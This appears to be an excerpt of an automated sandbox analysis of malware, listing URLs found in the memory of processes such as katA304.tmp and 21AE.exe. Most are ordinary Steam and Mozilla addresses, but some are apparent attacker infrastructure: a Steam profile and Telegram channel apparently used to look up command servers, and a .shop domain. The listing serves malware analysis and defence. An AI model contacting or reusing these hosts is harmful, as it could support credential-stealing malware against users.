                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/pr
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                  Source: katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: BGHJJD.13.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: https://mozilla.org0/
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: explorer.exe, 00000002.00000000.2042302155.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: C9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000978000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899Y
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: GIIDBG.13.drString found in binary or memory: https://support.mozilla.org
                  Source: GIIDBG.13.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: GIIDBG.13.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                  Source: C9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
                  Source: 21AE.exe, 00000005.00000003.2357257185.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.000000000089C000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000801000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506059857.000000000089B000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2397590103.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/
                  Source: 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/Jf
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/X
